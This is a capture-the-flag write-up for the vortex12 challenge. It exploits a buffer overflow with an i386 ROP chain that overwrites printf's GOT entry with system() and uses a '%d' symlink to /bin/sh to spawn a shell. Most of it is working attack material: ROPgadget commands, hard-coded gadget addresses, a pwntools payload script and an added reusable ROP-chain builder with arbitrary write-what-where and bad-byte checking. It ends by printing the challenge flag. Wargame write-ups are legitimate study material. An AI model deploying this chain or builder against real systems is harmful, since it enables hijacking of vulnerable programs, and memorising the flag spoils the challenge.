In this challenge we need a ROP chain to exploit the buffer overflow. We take our gadgets from libc.so.6 and from ld-linux.so.2.
ldd shows where each shared library is loaded:
ldd /vortex/vortex12
/lib/i386-linux-gnu/libc.so.6 (0xf7d7d000)
/lib/ld-linux.so.2 (0xf7fc9000)
Hard-coding these addresses only works because ASLR is disabled on the target (the exploit below relies on that); with ASLR enabled they change on every run.
Find "pop eax ; ret" and "pop edx ; ret" in libc.so.6:
ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "pop|ret" | grep -E "pop (eax|edx) ; ret"
Then find a "mov [edx], eax ; ret" in ld-linux.so.2. Together with the two pops this is a write-what-where primitive: load the value into eax, the destination into edx, and the mov stores it.
ROPgadget --binary /lib/ld-linux.so.2 --only "mov|ret" | grep -E "mov .* \[edx\], eax ; ret"

After the write, the chain only needs to call exit, so first find "mov eax, 1 ; ret" (1 is SYS_exit on i386):
ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "mov|ret" | grep -E "mov eax, 1 ; ret"
and then an "int 0x80" to enter the kernel:
ROPgadget --binary /lib/i386-linux-gnu/libc.so.6 --only "int"
The chain overwrites printf's GOT entry with the address of system, so the program's later printf("%d", ...) call lands in system instead, and we can see it tries to run system("%d").

system() runs its argument through /bin/sh, which looks the command up in PATH, so first put the current directory at the front of PATH:
export PATH=.:$PATH
and then create a symlink named %d that points to /bin/sh, so that system("%d") runs a shell:
ln -sf /bin/sh "%d"
#!/usr/bin/python3
import sys
from pwn import p32
printf_got_address = 0x0804c004 # printf's GOT slot (the entry its PLT stub jumps through)
system_address = 0xf7dcd430 # system() in libc
base_address_ld_linux = 0xf7fc9000 # where /lib/ld-linux.so.2 is loaded (from ldd, ASLR off)
base_address_libc = 0xf7d7d000 # where /lib/i386-linux-gnu/libc.so.6 is loaded (from ldd, ASLR off)
# gadget offsets from ROPgadget, relative to each library's base
pop_eax = base_address_libc + 0x0012b311 # pop eax ; ret
pop_edx = base_address_libc + 0x0003be0d # pop edx ; ret
mov_into_edx_eax = base_address_ld_linux + 0x0001250b # mov [edx], eax ; ret
mov_eax_1 = base_address_libc + 0x0005cdb5 # mov eax, 1 ; ret
int_0x80 = base_address_libc + 0x00039ed4 # int 0x80
# chain: *(printf GOT slot) = system_address, then exit via int 0x80
payload = b'A'*1036 # padding up to the saved return address
payload += p32(pop_eax)
payload += p32(system_address) # eax = system_address
payload += p32(pop_edx)
payload += p32(printf_got_address) # edx = printf_got_address
payload += p32(mov_into_edx_eax) # mov [printf_got_address], system_address
payload += p32(mov_eax_1) # eax = 1 (SYS_exit)
payload += p32(int_0x80) # int 0x80
sys.stdout.buffer.write(payload)
finally :)
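As an added example that is not part of the original write-up, here is the same chain turned into a small reusable builder. The pop eax / pop edx / mov [edx], eax gadgets are a general write-what-where primitive, so the builder goes beyond the single GOT overwrite above: it can emit any number of word writes (a whole string, not only one slot) and scans the finished payload for bytes that a string-based input routine would truncate. The library bases, gadget offsets, GOT address, system address and the 1036-byte distance are the values from the write-up; the write_bytes helper, the 0x00/0x0a bad-byte check and the /bin/sh sample write are my illustrations, not steps of the original exploit. It uses struct instead of pwntools so it runs without that dependency.

```python
#!/usr/bin/env python3
"""Build an i386 ROP chain from a pop/pop/mov write-what-where primitive.

Addresses and offsets are the vortex12 values from the write-up above.
The multi-word write and the bad-byte scan are added illustrations.
"""
import struct
import sys

# Library load addresses from `ldd` on the target (only stable with ASLR off).
BASE_LIBC = 0xF7D7D000
BASE_LD = 0xF7FC9000

# Gadget offsets relative to each library, as found with ROPgadget.
GADGETS = {
    "pop_eax": BASE_LIBC + 0x0012B311,    # pop eax ; ret
    "pop_edx": BASE_LIBC + 0x0003BE0D,    # pop edx ; ret
    "mov_edx_eax": BASE_LD + 0x0001250B,  # mov [edx], eax ; ret
    "mov_eax_1": BASE_LIBC + 0x0005CDB5,  # mov eax, 1 ; ret
    "int_0x80": BASE_LIBC + 0x00039ED4,   # int 0x80
}

PRINTF_GOT = 0x0804C004   # printf's GOT slot in the non-PIE binary
SYSTEM = 0xF7DCD430       # system() in libc
OVERFLOW_OFFSET = 1036    # bytes from the start of the buffer to the saved EIP


def p32(value):
    """Pack a 32-bit little-endian word (same as pwntools' p32)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def write32(addr, value, g=GADGETS):
    """One write-what-where: *(uint32_t *)addr = value."""
    return (p32(g["pop_eax"]) + p32(value)
            + p32(g["pop_edx"]) + p32(addr)
            + p32(g["mov_edx_eax"]))


def write_bytes(addr, data, g=GADGETS):
    """Write an arbitrary byte string, one 4-byte word at a time (NUL-padded)."""
    data = data + b"\0" * (-len(data) % 4)
    chain = b""
    for off in range(0, len(data), 4):
        word = struct.unpack("<I", data[off:off + 4])[0]
        chain += write32(addr + off, word, g)
    return chain


def exit_syscall(g=GADGETS):
    """Tail: eax = 1 (SYS_exit on i386); int 0x80."""
    return p32(g["mov_eax_1"]) + p32(g["int_0x80"])


def bad_bytes(payload, forbidden=(0x00, 0x0A)):
    """Offsets of bytes that would cut the input short if the program reads it
    with a string function (assumed forbidden set: NUL and newline)."""
    return [i for i, b in enumerate(payload) if b in forbidden]


def build_payload(writes, offset=OVERFLOW_OFFSET, g=GADGETS):
    """Padding, then one write per (addr, value) pair, then the exit tail."""
    chain = b"".join(write32(a, v, g) for a, v in writes)
    return b"A" * offset + chain + exit_syscall(g)


if __name__ == "__main__":
    # The write-up's chain: point printf's GOT entry at system, then exit.
    payload = build_payload([(PRINTF_GOT, SYSTEM)])
    if bad_bytes(payload):
        sys.exit("payload contains a forbidden byte")
    sys.stdout.buffer.write(payload)
```

Running it as a script reproduces the payload from the write-up byte for byte. Note that writing a string such as /bin/sh through this primitive necessarily puts a NUL terminator into the chain, which the scan flags; the %d symlink trick above sidesteps that entirely because the "%d" string is already in the program.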

Flag: kklZMRIrj